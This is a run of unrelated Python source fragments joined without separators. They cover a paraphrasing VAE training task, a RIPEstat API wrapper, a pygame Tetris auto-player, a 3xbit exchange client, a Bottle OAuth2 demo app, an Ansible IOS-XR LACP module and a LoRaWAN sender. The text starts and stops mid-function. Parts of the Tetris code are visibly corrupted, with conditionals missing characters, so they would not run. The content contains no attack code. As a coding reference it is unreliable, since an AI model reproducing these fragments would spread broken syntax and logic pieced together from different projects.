train_step(self, batch_size, loop_dataset=True, iteration=0): assert self.train_dataset is not None, "[!] ERROR: Training dataset not loaded. Please load the dataset beforehand for training." _, _, par_1_words, par_1_lengths, par_2_words, par_2_lengths = self.train_dataset.get_batch(batch_size, loop_dataset=loop_dataset, toTorch=True, label_lengths=True) par_1_words = par_1_words[DATA_GLOVE] par_1_lengths = par_1_lengths[DATA_GLOVE] current_tf_ratio = self._get_tf_ratio(iteration) par_1_res, par_2_res, par_1_style, par_2_style, par_semantics = self.model.contextless_paraphrasing(_input = (par_1_words, par_1_lengths, par_2_words, par_2_lengths, None, None, None, None), teacher_forcing = True, teacher_forcing_ratio = current_tf_ratio, switch_rate = self.switch_rate) loss_1, loss_VAE_1, acc_1 = self._calculate_loss(par_1_res, par_1_words, par_1_style) loss_2, loss_VAE_2, acc_2 = self._calculate_loss(par_2_res, par_2_words, par_2_style) loss = (loss_1 + loss_2) / 2.0 loss_VAE = (loss_VAE_1 + loss_VAE_2) / 2.0 loss_cos = (1 - F.cosine_similarity(par_semantics[0], par_semantics[1], dim=-1)).mean() acc = (acc_1 + acc_2) / 2.0 final_loss = loss + loss_VAE * self.KL_scheduler.get(iteration) + loss_cos * self.cosine_loss_scaling self.summary_dict["loss_rec"].append(loss.item()) self.summary_dict["loss_cosine"].append(loss_cos.item()) self.summary_dict["loss_VAE"].append(loss_VAE.item()) self.summary_dict["KL_scheduler"] = [self.KL_scheduler.get(iteration)] self.summary_dict["loss_combined"].append(final_loss.item()) for dict_key, hist_tensors in zip(["style_mu", "style_sigma"], [[par_1_style[1], par_2_style[1]], [par_1_style[2], par_2_style[2]]]): new_vals = [t.detach().cpu().contiguous().view(-1).numpy().tolist() for t in hist_tensors if t is not None] new_vals = [e for sublist in new_vals for e in sublist] self.summary_dict[dict_key].append(new_vals) while len(self.summary_dict[dict_key]) > 10: del self.summary_dict[dict_key][0] return final_loss, acc def _calculate_loss(self, par_res, batch_labels, par_style): par_word_dist, slot_dist, _, _ = par_res # Remove unknown word labels from the loss if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] else: print("[#] WARNING: Batch labels were not shortend. First token ids: \n%s \nSOS index: %i" % (str(batch_labels[:,0]), get_SOS_index())) unknown_label = ((batch_labels == get_UNK_index()) | (batch_labels < 0)).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label ## Loss reconstruction loss = self.loss_module(par_word_dist.view(-1, par_word_dist.shape[-1]), batch_labels.view(-1)) ## Accuracy calculation _, pred_labels = torch.max(par_word_dist, dim=-1) acc = torch.sum(pred_labels == batch_labels).float() / torch.sum(batch_labels != -1).float() ## Loss VAE regularization _, style_mu, style_std = par_style loss_VAE = ContextAwareDialogueTask._calc_loss_VAE(style_mu, style_std) return loss, loss_VAE, acc def _eval_batch(self, batch, use_context_style=False): _, _, par_1_words, par_1_lengths, par_2_words, par_2_lengths = batch par_1_words = par_1_words[DATA_GLOVE] par_1_lengths = par_1_lengths[DATA_GLOVE] eval_swr = (1.0 if self.switch_rate > 0.0 else 0.0) p1_res, p2_res, _, _, _ = self.model.contextless_paraphrasing(_input = (par_1_words, par_1_lengths, par_2_words, par_2_lengths, None, None, None, None), teacher_forcing = True, teacher_forcing_ratio = 1.0, switch_rate = eval_swr) p1_perplexity_probs, _, _, _ = p1_res p2_perplexity_probs, _, _, _ = p2_res p1_res_tf, p2_res_tf, _, _, _ = self.model.contextless_paraphrasing(_input = (par_1_words, par_1_lengths, par_2_words, par_2_lengths, None, None, None, None), teacher_forcing = False, teacher_forcing_ratio = 0.0, switch_rate = eval_swr) _, _, p1_generated_words, p1_generated_lengths = p1_res_tf _, _, p2_generated_words, p2_generated_lengths = p2_res_tf p1_perplexity_probs = p1_perplexity_probs.detach() p1_generated_words = p1_generated_words.detach() p1_generated_lengths = p1_generated_lengths.detach() p2_perplexity_probs = p2_perplexity_probs.detach() p2_generated_words = p2_generated_words.detach() p2_generated_lengths = p2_generated_lengths.detach() # Remove unknown word labels from the evaluation batch_labels = par_1_words if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] unknown_label = ((batch_labels == get_UNK_index()) | (batch_labels == -1)).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label return batch_labels, p1_perplexity_probs, p1_generated_words, p1_generated_lengths def eval(self, dataset=None, batch_size=64): # Default: if no dataset is specified, we use validation dataset if dataset is None: assert self.val_dataset is not None, "[!] ERROR: Validation dataset not loaded. Please load the dataset beforehand for evaluation." dataset = self.val_dataset self.model.eval() if not self.debug: batch_size = 128 # Prepare metrics number_batches = int(math.ceil(dataset.get_num_examples() * 1.0 / batch_size)) if self.debug: number_batches = min(8, number_batches) perplexity = [] hypotheses, references = None, None # Evaluation loop for batch_ind in range(number_batches): if debug_level() == 0: print("Evaluation process: %4.2f%% (batch %i of %i)" % (100.0 * batch_ind / number_batches, batch_ind+1, number_batches), end="\r") # Evaluate single batch with torch.no_grad(): batch = dataset.get_batch(batch_size, loop_dataset=False, toTorch=True, label_lengths=True, noun_mask=False, mask_prob=0.0) batch_labels, perplexity_logits, generated_words, generated_lengths = self._eval_batch(batch) # Perplexity calculation perplexity += TaskTemplate._eval_preplexity(perplexity_logits, batch_labels).cpu().numpy().tolist() hypotheses, references = add_if_not_none(TaskTemplate._preds_to_sents(batch_labels, generated_words, generated_lengths), (hypotheses, references)) BLEU_score, prec_per_ngram = get_BLEU_score(hypotheses, references) ROUGE_score = get_ROUGE_score(hypotheses, references) # Metric output avg_perplexity = sum(perplexity) / len(perplexity) median_perplexity = median(perplexity) unigram_variety, unigram_entropy = get_diversity_measure(hypotheses, n_gram=1) bigram_variety, bigram_entropy = get_diversity_measure(hypotheses, n_gram=2) unigram_variety_gt, unigram_entropy_gt = get_diversity_measure(references, n_gram=1) bigram_variety_gt, bigram_entropy_gt = get_diversity_measure(references, n_gram=2) detailed_metrics = { "perplexity": avg_perplexity, "perplexity_median": median_perplexity, "diversity_unigram_entropy": unigram_entropy, "diversity_bigram_entropy": bigram_entropy, "diversity_unigram": unigram_variety, "diversity_bigram": bigram_variety, "diversity_unigram_entropy_gt": unigram_entropy_gt, "diversity_bigram_entropy_gt": bigram_entropy_gt, "diversity_unigram_gt": unigram_variety_gt, "diversity_bigram_gt": bigram_variety_gt, "BLEU": BLEU_score } for n in range(len(prec_per_ngram)): detailed_metrics["BLEU_%i-gram" % (n+1)] = float(prec_per_ngram[n]) for metric, results in ROUGE_score.items(): if metric[-1] in ["1", "2", "3", "4"]: continue for sub_category, val in results.items(): detailed_metrics[metric + "_" + sub_category] = val self.model.train() dataset.reset_index() return BLEU_score, detailed_metrics def add_summary(self, writer, iteration): # TODO: Add some example generations here. Either run the model again for some random sentences, or save last training sentences writer.add_scalar("train_%s/teacher_forcing_ratio" % (self.name), self._get_tf_ratio(iteration), iteration) for key, val in self.summary_dict.items(): if not isinstance(val, list): writer.add_scalar("train_%s/%s" % (self.name, key), val, iteration) self.summary_dict[key] = 0.0 elif len(val) == 0: continue elif not isinstance(val[0], list): writer.add_scalar("train_%s/%s" % (self.name, key), mean(val), iteration) self.summary_dict[key] = list() else: val = [v for sublist in val for v in sublist] if len(val) == 0: continue writer.add_histogram("train_%s/%s" % (self.name, key), np.array(val), iteration) self.summary_dict[key] = list() if self.debug or iteration % 1000 == 0: gen_list = self.generate_random_style_samples() for i in range(len(gen_list)): if not self.generated_before: writer.add_text(self.name + "_samp%i_input_phrase" % (i), gen_list[i][0], iteration) for j in range(len(gen_list[i][1])): writer.add_text(self.name + "_samp%i_sample_%i" % (i, j), gen_list[i][1][j], iteration) self.generated_before = True def generate_random_style_samples(self): self.model.eval() # 1.) Put data on GPU batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch) _, _, par_words, par_lengths, _, _ = batch_torch par_words = par_words[DATA_GLOVE] par_lengths = par_lengths[DATA_GLOVE] par_masks = self.model.embedding_module.generate_mask(par_words) with torch.no_grad(): _, _, gen_par_words, gen_par_lengths = self.model.sample_reconstruction_styles((par_words, par_lengths, par_masks, None, None), num_samples=12) del batch_torch # 3.) Reconstruct generated answer and input generated_paraphrases = list() input_phrases = list() gen_par_words = gen_par_words.cpu().numpy() gen_par_lengths = gen_par_lengths.cpu().numpy() par_words = self.gen_batch[2][DATA_GLOVE] par_lengths = self.gen_batch[3][DATA_GLOVE] for embeds, lengths, list_to_add, add_sents_up in zip([par_words, gen_par_words], [par_lengths, gen_par_lengths], [input_phrases, generated_paraphrases], [True, False]): reconstruct_sentences(embeds, lengths, list_to_add=list_to_add, add_sents_up=add_sents_up) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, generated_paraphrases)) self.model.train() return gen_list """Provide the RIPEstat class.""" from functools import partial from typing import Optional, Type from .api import get from .stat.abuse_contact_finder import AbuseContactFinder from .stat.announced_prefixes import AnnouncedPrefixes from .stat.asn_neighbours import ASNNeighbours from .stat.looking_glass import LookingGlass from .stat.network_info import NetworkInfo from .stat.ris_peers import RISPeers from .stat.rpki_validation_status import RPKIValidationStatus from .stat.whats_my_ip import WhatsMyIp class RIPEstat: """ The RIPEstat class provides a convenient way to access the RIPEstat public API. Instances of this class are the gateway to interacting with RIPE's stat API through PRSW. **If you have a `sourceapp` parameter from RIPE, see `__init__` documentation for details.** .. code-block:: python import prsw ripe = prsw.RIPEstat() """ def __init__( self, data_overload_limit: Optional[str] = "", sourceapp: Optional[str] = "" ) -> None: """ Initialize a RIPEstat instance. :param data_overload_limit: Override the soft-limit check ( see `data_overload_limit()`) :param sourceapp: A unique identifier attached to API calls. This identifier helps RIPE assit you when you encounter any problems with the system. The identifier can be your project name or your company's. See `RIPEstat API Overview `_ for details. """ self.sourceapp = sourceapp self.data_overload_limit = data_overload_limit return @property def data_overload_limit(self) -> str: """ The data overload prevention is to protect users, especially widgets, from getting more data than they can handle. For this reason some data calls already support a soft-limit check which returns a warning if the output looks to be more than usual. This prevention mechanism should only kick in if the request stems from a browser (the referrer header set), but in case it happens for a non-browser request, it can easily suppressed by the "data_overload_limit" parameter set to "ignore". """ return self._data_overload_limit @data_overload_limit.setter def data_overload_limit(self, string): if string == "ignore" or string == "": self._data_overload_limit = string else: raise ValueError("data_overload_limit expected 'ignore' or blank string") def _get(self, path, params=None): """Retrieve the requested path with parameters as GET from the API.""" params = {} if params is None else params if self.data_overload_limit: params["data_overload_limit"] = "ignore" if self.sourceapp: params["sourceapp"] = self.sourceapp return get(path, params) @property def abuse_contact_finder(self) -> Type[AbuseContactFinder]: """Lazy alias to :class:`.stat.AbuseContactFinder`.""" return partial(AbuseContactFinder, self) @property def announced_prefixes(self) -> Type[AnnouncedPrefixes]: """Lazy alias to :class:`.stat.AnnouncedPrefixes`.""" return partial(AnnouncedPrefixes, self) @property def asn_neighbours(self) -> Type[ASNNeighbours]: """Lazy alias to :class:`.stat.ASNNeighbours`.""" return partial(ASNNeighbours, self) @property def looking_glass(self) -> Type[LookingGlass]: """Lazy alias to :class:`.stat.LookingGlass`.""" return partial(LookingGlass, self) @property def network_info(self) -> Type[NetworkInfo]: """Lazy alias to :class:`.stat.NetworkInfo`.""" return partial(NetworkInfo, self) @property def ris_peers(self) -> Type[RISPeers]: """Lazy alias to :class:`.stat.RISPeers`.""" return partial(RISPeers, self) @property def rpki_validation_status(self) -> Type[RPKIValidationStatus]: """Lazy alias to :class:`.stat.RPKIValidationStatus`.""" return partial(RPKIValidationStatus, self) @property def whats_my_ip(self) -> Type[WhatsMyIp]: """Laze alias to :class:`.stat.WhatsMyIp`.""" return partial(WhatsMyIp, self) from random import randrange,shuffle from math import floor from statistics import mean,stdev import time import pygame from pygame.locals import * #dimensions of the game grid dimx=10 dimy=20 #colors corresponding to specific pieces colorshape={"line":(0,255,255),"l":(0,0,255),"li":(255,125,0),"z":(255,0,0),"zi":(0,255,0),"square":(255,255,0),"t":(255,0,255)} #setting up the arrays gamegrid=[] shapes=[] for i in range(0,dimy): gamegrid.append([]) shapes.append([]) for j in range(0,dimx): gamegrid[i].append(0) shapes[i].append(0) #class for each shape class Shape: def __init__(self,shape): self.shape=shape mid=floor(dimx/2) #start positions of each piece of the shape based on type if self.shape=="line": self.a=[mid-1,1];self.b=[mid,1];self.c=[mid+1,1];self.d=[mid+2,1];self.e=[mid+1,1] elif self.shape=="t": self.a=[mid-1,1];self.b=[mid,1];self.c=[mid,0];self.d=[mid+1,1];self.e=[mid,1] elif self.shape=="l": self.a=[mid-1,1];self.b=[mid,1];self.c=[mid+1,1];self.d=[mid+1,0];self.e=[mid,1] elif self.shape=="li": self.a=[mid-1,0];self.b=[mid-1,1];self.c=[mid,1];self.d=[mid+1,1];self.e=[mid,1] elif self.shape=="square": self.a=[mid,0];self.b=[mid+1,0];self.c=[mid,1];self.d=[mid+1,1];self.e=[mid,1] elif self.shape=="z": self.a=[mid-1,0];self.b=[mid,0];self.c=[mid,1];self.d=[mid+1,1];self.e=[mid,1] elif self.shape=="zi": self.a=[mid-1,1];self.b=[mid,1];self.c=[mid,0];self.d=[mid+1,0];self.e=[mid,1] self.pieces=[self.a,self.b,self.c,self.d] #rotates the pieces clockwise def rotate(self): #square pieces don't rotate if self.shape=="square": pass #line pieces have special rotation elif self.shape=="line": if self.a[1]==self.b[1]: if self.a[0]+2=0 and self.d[0]-1>=0: self.a[0]+=2;self.a[1]+=1;self.b[0]+=1;self.c[1]-=1;self.d[0]-=1;self.d[1]-=2 else: if self.a[0]-2>=0 and self.b[0]-1>=0 and self.c[1]+1=0 and (self.e[0]-(i[1]-self.e[1]))0: return for j in range(0,dimy): for k in range(0,dimx): if Tetris.shapes[j][k]!=0 and j==i[1] and k==i[0]-1: return for i in self.pieces: i[0]-=1 self.e[0]-=1 #moves the shape right def moveright(self): for i in self.pieces: if not i[0]=0 and i<=dimy: #displays the shapes already in the grid if self.shapes[i][j]!=0: pygame.draw.rect(screen,colorshape[self.shapes[i][j]],(50+j*25,50+i*25,25,25)) #displays the current shape elif self.grid[i][j]==1: pygame.draw.rect(screen,colorshape[self.shape],(50+j*25,50+i*25,25,25)) else: pygame.draw.rect(screen,(25,25,25),(51+j*25,51+i*25,23,23)) #checks if a certain move will score points def checkScore(self): gn=0 for k in range(0,dimy): gm=0 for j in range(0,dimx): if self.tshapes[k][j]!=0: gm+=1 if gm==dimx: gn+=1 self.incscore=gn #checks if a certain move will add holes def checkHoles(self): for i in range(0,dimx): for j in range(0,dimy): if self.tshapes[j][i]==0 and self.tshapes[j-1][i]!=0: self.holes+=1 #checks the height of each column def getHeights(self): for i in range(0,dimx): self.heights.append(0) for j in range(dimy-1,0,-1): if self.tshapes[j][i]!=0: self.heights[i]=dimy-j #goes through all possible moves to find the best one based on amount of holes, heights of columns, etc. def parsemoves(self,theshape): self.possible=[] self.getto=[] if theshape=="line": ii=2 elif theshape=="square": ii=1 else: ii=4 #goes through every move and add it to a list for ii in range(0,4): for j in range(0,11): self.test=Shape(theshape) for k in range(0,ii): self.test.rotate() if j<7: for k in range(0,j): self.test.moveleft() else: for k in range(0,j-6): self.test.moveright() self.test.harddrop() for k in self.test.pieces: k[1]-=1 self.possible.append(self.test.pieces) if j<7: self.getto.append([ii,j,True]) else: self.getto.append([ii,j-6,False]) self.values=[] self.tshapes=[] self.check=[] #finds the value of each possible move for ii in range(0,len(self.possible)): self.tshapes=self.shapes.copy() self.nnn=[] for jj in range(0,len(self.possible[ii])): self.tshapes[self.possible[ii][jj][1]][self.possible[ii][jj][0]]=theshape #attributes that determine the best move self.holes=0 self.bumpiness=0 self.heights=[] self.incscore=0 self.aggheight=0 self.maxheight=0 self.getHeights() self.checkHoles() self.checkScore() self.aggheight=sum(self.heights) self.maxheight=max(self.heights) for i in range(0,len(self.heights)-1): self.bumpiness+=abs(self.heights[i]-self.heights[i+1]) #adding together the attributes self.values.append(self.maxhmult*self.maxheight+self.scoremult*self.incscore+self.bumpymult*self.bumpiness+self.holemult*self.holes+self.agghmult*self.aggheight) for jj in range(0,len(self.possible[ii])): self.tshapes[self.possible[ii][jj][1]][self.possible[ii][jj][0]]=0 #finds the best possible move based on the values return max(self.values),self.getto[self.values.index(max(self.values))] def choosemove(self): #lll=[0,0];ooo=[0,0] #lll[0],ooo[0]=self.parsemoves(self.shape) #lll[1],ooo[1]=self.parsemoves(self.held.shape) #if lll[0]>=lll[1]: # ooo=ooo[0] #elif lll[1]>lll[0]: # ooo=ooo[1] # self.holdshape() o,oo=self.parsemoves(self.shape) for i in range(0,oo[0]): self.s.rotate() for i in range(0,oo[1]): if oo[2]==True: self.s.moveleft() else: self.s.moveright() self.s.harddrop() self.prtscr() self.checkend() self.clearlines() self.prtscr() #creates a new shape def newshape(self): self.shape=self.shapenum[self.shapez] if self.shapez==6: shuffle(self.shapenum) self.shapez=-1 self.s=Shape(self.shape) self.nextp=Shape(self.shapenum[self.shapez+1]) self.shapez+=1 #holds the current shape and brings the held shape into play def holdshape(self): if self.held=="": self.held=Shape(self.shape) self.newshape() #will hold only if you haven't already held a shape this round elif self.heldal==0: hshape=self.held.shape self.held=Shape(self.shape) self.shape=hshape self.s=Shape(self.shape) self.heldal=1 #clears a line if it's filled in all the way horizontally def clearlines(self): n=0 for i in range(0,dimy): m=0 for j in range(0,dimx): if self.shapes[i][j]!=0: m+=1 if m==dimx: n+=1 #clears pieces for j in range(0,dimx): self.shapes[i][j]==0 #brings pieces above the cleared line down for h in range(i,0,-1): for j in range(0,dimx): self.shapes[h][j]=self.shapes[h-1][j] #updates score based on how many lines have been cleared this round if n==1: self.score+=100 elif n==2: self.score+=300 elif n==3: self.score+=500 elif n==4: self.score+=800 self.linescl+=n #checks if the current piece is at the bottom of the screen or has hit a piece already in the grid def checkend(self): for j in range(0,dimy): for k in range(0,dimx): for i in self.pieces: #locks the shape in and creates a new shape if self.shapes[j][k]!=0 and j==i[1] and k==i[0]: for l in self.pieces: l[1]-=1 self.shapes[l[1]][l[0]]=self.shape self.heldal=0;self.score+=10 self.newshape() return for i in self.pieces: #locks the shape in and creates a new shape if i[1]>dimy-1: for k in self.pieces: self.shapes[k[1]-1][k[0]]=self.shape self.heldal=0;self.score+=10 self.newshape() return #the main loop for the bame def gameloop(self): self.pieces=[self.s.a,self.s.b,self.s.c,self.s.d] self.choosemove() #self.checkend() #self.clearlines() #updates the grid based on the position of the shapes in the grid for i in range(0,dimy): for j in range(0,dimx): if self.shapes[i][j]==0: self.grid[i][j]=0 else: self.grid[i][j]=1 #updates the grid based on the position of the current shape for i in self.pieces: if i[1]0) or (frac<0.75 and frac>0.5): screen.blit(starttext,(60,150)) pygame.display.flip() #game loop for pygame to run the game and check user input while Tetris.running: screen.fill((0,0,0)) for i in pygame.event.get(): #quits game if exit button is pressed if i.type==pygame.QUIT: Tetris.running=False pygame.quit() quit() if i.type==pygame.KEYDOWN and i.key==pygame.K_x: Tetris.choosemove() #moves the piece down every certain amount of time #elif i.type==MOVE1: #Tetris.s.movedown() #Tetris.prtscr() Tetris.gameloop() Tetris.prtscr() pygame.display.flip() marciks/python-3xbit # coding=utf-8 from .enums import * from requests import get, post import time class api3xbit: def __init__(self, client_id, client_secret): self.__base_url = PUBLIC_BASE_URL self.__client_id = client_id self.__client_secret = client_secret self.access_token = None def auth(self): endpoint = "/api/oauth/token/" data = { 'grant_type': 'client_credentials', 'client_id': self.__client_id, 'client_secret': self.__client_secret } time.sleep(RATE_LIMITER) r = post(self.__base_url+endpoint, data=data) return r.json() def balance(self, currency=None): while True: if currency: endpoint = "/v1/balance/{}".format(currency) else: endpoint = "/v1/balance/" headers = { "Authorization": "Bearer {}".format(self.access_token)} r = get(self.__base_url+endpoint, headers=headers) if r.status_code == 403: time.sleep(RATE_LIMITER) self.access_token = self.auth()["access_token"] continue return r.json() def tickers(self, conversion=None): if conversion: endpoint = "/ticker/{0}/".format(conversion) else: endpoint = "/ticker/" r = get(self.__base_url+endpoint) return r.json() def orderbook(self, primary_pair, second_pair): while True: endpoint = "/v1/orderbook/{}/{}/".format(primary_pair, second_pair) headers = { "Authorization": "Bearer {}".format(self.access_token)} r = get(self.__base_url+endpoint, headers=headers) if r.status_code == 403: time.sleep(RATE_LIMITER) self.access_token = self.auth()["access_token"] continue return r.json() print() #logging.basicConfig(level=logging.ERROR) api = api3xbit(API_KEYS["client_id"], API_KEYS["client_secret"]) pusher = pysher.Pusher(cluster="us2", key="") orderbooks = defaultdict(dict) def main(): def created(data): data = json.loads(data) orderbooks[str(data["unit_price"]["currency"])+"_"+str(data["remaining"]["currency"])][data["order_id"]] = data def done(data): data = json.loads(data) if data["unit_price"]["currency"]+"_"+data["remaining"]["currency"] in orderbooks: if data["order_id"] in orderbooks[data["unit_price"]["currency"]+"_"+data["remaining"]["currency"]]: orderbooks[data["unit_price"]["currency"]+"_"+data["remaining"]["currency"]].pop(data["order_id"], None) def updated(data): data = json.loads(data) orderbooks[data["unit_price"]["currency"]+"_"+data["remaining"]["currency"]][data["order_id"]] = data def deleted(data): data = json.loads(data) if data["unit_price"]["currency"]+"_"+data["remaining"]["currency"] in orderbooks: if data["order_id"] in orderbooks[data["unit_price"]["currency"]+"_"+data["remaining"]["currency"]]: orderbooks[data["unit_price"]["currency"]+"_"+data["remaining"]["currency"]].pop(data["order_id"], None) # We can't subscribe until we've connected, so we use a callback handler # to subscribe when able def connect_handler(data): #channel1 = pusher.subscribe('BRL-orderbook-history') #channel2 = pusher.subscribe('BRL-user-channel-531') sellChanell = pusher.subscribe('BRL-orderbook-sell') buyChannel = pusher.subscribe('BRL-orderbook-buy') sellChanell.bind('created', created) sellChanell.bind('deleted', deleted) sellChanell.bind('updated', updated) sellChanell.bind('done', done) buyChannel.bind('created', created) buyChannel.bind('deleted', deleted) buyChannel.bind('updated', updated) buyChannel.bind('done', done) pusher.connection.bind('pusher:connection_established', connect_handler) pusher.connect() kpdemetriou/uclif from bottle import get, run, request, response, redirect, template from bottle import HTTPError from datetime import datetime from UCLIFAuth import UCLIFAuthConfidential, UCLIF_JWT_KEY, UCLIF_AUTH_ENDPOINT, UCLIF_TOKEN_ENDPOINT from config import * import json @get("/") def route_root(): return template("sso") @get("/sso") def route_sso(): try: ucl_auth = UCLIFAuthConfidential(OAUTH2_CLIENT_ID, OAUTH2_CLIENT_SECRET, OAUTH2_REDIRECT_URI) auth_url, state = ucl_auth.url(*OAUTH2_SCOPE_TOKENS) except ValueError: return HTTPError(500, "Internal server error.") response.set_cookie("state", state) return redirect(auth_url, 302) @get("/info") def route_info(): param_code = request.params.get("code", None) param_state = request.params.get("state", None) cookie_state = request.get_cookie("state", None) response.set_cookie("state", "", expires=0) if not param_code: return HTTPError(400, "Missing code parameter.") if not param_state: return HTTPError(400, "Missing state parameter.") if not cookie_state: return HTTPError(400, "Missing state cookie.") try: ucl_auth = UCLIFAuthConfidential(OAUTH2_CLIENT_ID, OAUTH2_CLIENT_SECRET, OAUTH2_REDIRECT_URI) except ValueError: return HTTPError(500, "Internal server error.") try: token_type, expires_in, token = ucl_auth.code(param_code, param_state, cookie_state) except ValueError: return HTTPError(400, "Token acquisition or validation failed.") info_oauth2_state = param_state info_oauth2_code = param_code info_oauth2_token_type = token_type info_oauth2_expires_in = expires_in info_oauth2_client_id = OAUTH2_CLIENT_ID info_oauth2_client_secret = "*" * len(OAUTH2_CLIENT_SECRET) info_oauth2_redirect_uri = OAUTH2_REDIRECT_URI info_oauth2_auth_endpoint = UCLIF_AUTH_ENDPOINT info_oauth2_token_endpoint = UCLIF_TOKEN_ENDPOINT info_jwt_iss = token.get("iss", "") info_jwt_aud = token.get("aud", "") info_jwt_exp = datetime.fromtimestamp(token.get("exp", 0)).strftime("%Y-%m-%d %H:%M:%S") info_jwt_nbf = datetime.fromtimestamp(token.get("nbf", 0)).strftime("%Y-%m-%d %H:%M:%S") info_jwt_iat = datetime.fromtimestamp(token.get("iat", 0)).strftime("%Y-%m-%d %H:%M:%S") info_jwt_jti = token.get("jti", "") info_pre_key = UCLIF_JWT_KEY.strip() info_pre_jwt = json.dumps(token, indent=4) return template( "info", info_oauth2_state=info_oauth2_state, info_oauth2_code=info_oauth2_code, info_oauth2_token_type=info_oauth2_token_type, info_oauth2_expires_in=info_oauth2_expires_in, info_oauth2_client_id=info_oauth2_client_id, info_oauth2_client_secret=info_oauth2_client_secret, info_oauth2_redirect_uri=info_oauth2_redirect_uri, info_oauth2_auth_endpoint=info_oauth2_auth_endpoint, info_oauth2_token_endpoint=info_oauth2_token_endpoint, info_jwt_iss=info_jwt_iss, info_jwt_aud=info_jwt_aud, info_jwt_exp=info_jwt_exp, info_jwt_nbf=info_jwt_nbf, info_jwt_iat=info_jwt_iat, info_jwt_jti=info_jwt_jti, info_pre_key=info_pre_key, info_pre_jwt=info_pre_jwt, ) run(server=HTTP_SERVER, host=HTTP_HOST, port=HTTP_PORT, debug=APP_DEBUG, reloader=APP_DEBUG) 1-10 # # -*- coding: utf-8 -*- # Copyright 2019 Red Hat # GNU General Public License v3.0+ # (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) """ The iosxr_lacp class It is in this file where the current configuration (as dict) is compared to the provided configuration (as dict) and the command set necessary to bring the current configuration to it's desired end-state is created """ from __future__ import absolute_import, division, print_function __metaclass__ = type from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.cfg.base import ( ConfigBase, ) from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import ( to_list, ) from ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.facts.facts import ( Facts, ) from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import ( dict_diff, ) from ansible.module_utils.six import iteritems from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import ( remove_empties, ) from ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.utils.utils import ( flatten_dict, ) class Lacp(ConfigBase): """ The iosxr_lacp class """ gather_subset = ["!all", "!min"] gather_network_resources = ["lacp"] def __init__(self, module): super(Lacp, self).__init__(module) def get_lacp_facts(self, data=None): """ Get the 'facts' (the current configuration) :rtype: A dictionary :returns: The current configuration as a dictionary """ facts, _warnings = Facts(self._module).get_facts( self.gather_subset, self.gather_network_resources, data=data ) lacp_facts = facts["ansible_network_resources"].get("lacp") if not lacp_facts: return {} return lacp_facts def execute_module(self): """ Execute the module :rtype: A dictionary :returns: The result from module execution """ result = {"changed": False} warnings = list() commands = list() if self.state in self.ACTION_STATES: existing_lacp_facts = self.get_lacp_facts() else: existing_lacp_facts = {} if self.state in self.ACTION_STATES or self.state == "rendered": commands.extend(self.set_config(existing_lacp_facts)) if commands and self.state in self.ACTION_STATES: if not self._module.check_mode: self._connection.edit_config(commands) result["changed"] = True if self.state in self.ACTION_STATES: result["commands"] = commands if self.state in self.ACTION_STATES or self.state == "gathered": changed_lacp_facts = self.get_lacp_facts() elif self.state == "rendered": result["rendered"] = commands elif self.state == "parsed": running_config = self._module.params["running_config"] if not running_config: self._module.fail_json( msg="value of running_config parameter must not be empty for state parsed" ) result["parsed"] = self.get_lacp_facts(data=running_config) if self.state in self.ACTION_STATES: result["before"] = existing_lacp_facts if result["changed"]: result["after"] = changed_lacp_facts elif self.state == "gathered": result["gathered"] = changed_lacp_facts result["warnings"] = warnings return result def set_config(self, existing_lacp_facts): """ Collect the configuration from the args passed to the module, collect the current configuration (as a dict from facts) :rtype: A list :returns: the commands necessary to migrate the current configuration to the desired configuration """ want = self._module.params.get("config") if not want: want = {} have = existing_lacp_facts resp = self.set_state(want, have) return to_list(resp) def set_state(self, want, have): """ Select the appropriate function based on the state provided :param want: the desired configuration as a dictionary :param have: the current configuration as a dictionary :rtype: A list :returns: the commands necessary to migrate the current configuration to the desired configuration """ if self.state in ("merged", "replaced", "rendered") and not want: self._module.fail_json( msg="value of config parameter must not be empty for state {0}".format( self.state ) ) if self.state == "deleted": commands = self._state_deleted(want, have) elif self.state in ("merged", "rendered"): commands = self._state_merged(want, have) elif self.state == "replaced": commands = self._state_replaced(want, have) return commands def _state_replaced(self, want, have): """ The command generator when state is replaced :rtype: A list :returns: the commands necessary to migrate the current configuration to the desired configuration """ commands = [] commands.extend(self._state_deleted(want, have)) commands.extend(self._state_merged(want, have)) return commands def _state_merged(self, want, have): """ The command generator when state is merged :rtype: A list :returns: the commands necessary to merge the provided into the current configuration """ commands = [] updates = dict_diff(have, want) if self.state == "rendered": updates = want if updates: for key, value in iteritems( flatten_dict(remove_empties(updates["system"])) ): commands.append( "lacp system {0} {1}".format( key.replace("address", "mac"), value ) ) return commands def _state_deleted(self, want, have): """ The command generator when state is deleted :rtype: A list :returns: the commands necessary to remove the current configuration of the provided objects """ commands = [] for x in [ k for k in have.get("system", {}) if k not in remove_empties(want.get("system", {})) ]: commands.append("no lacp system {0}".format(x)) return commands from SX127x.LoRa import * from SX127x.LoRaArgumentParser import LoRaArgumentParser from SX127x.board_config_ada import BOARD import LoRaPy.counter as counter import LoRaWAN from LoRaWAN.MHDR import MHDR import LoRaPy.reset_ada as reset_ada reset_ada.reset() BOARD.setup() parser = LoRaArgumentParser("LoRaWAN sender") class LoRaSender(LoRa): def __init__(self, devaddr=[], nwkey=[], appkey=[], verbose=False, callback=lambda *_, **__: None): super(LoRaSender, self).__init__(verbose) self.verbose = verbose self.devaddr = devaddr self.nwkey = nwkey self.appkey = appkey self.rx_callback = callback def on_rx_done(self): if self.verbose: print("RxDone") self.clear_irq_flags(RxDone=1) payload = self.read_payload(nocheck=True) # if self.verbose: # print("".join(format(x, '02x') for x in bytes(payload))) lorawan = LoRaWAN.new(self.nwkey, self.appkey) lorawan.read(payload) # call callback-function self.rx_callback(lorawan.get_payload()) # if self.verbose: # print("lorawan read payload internally") # print(lorawan.get_mhdr().get_mversion()) # print(lorawan.get_mhdr().get_mtype()) # 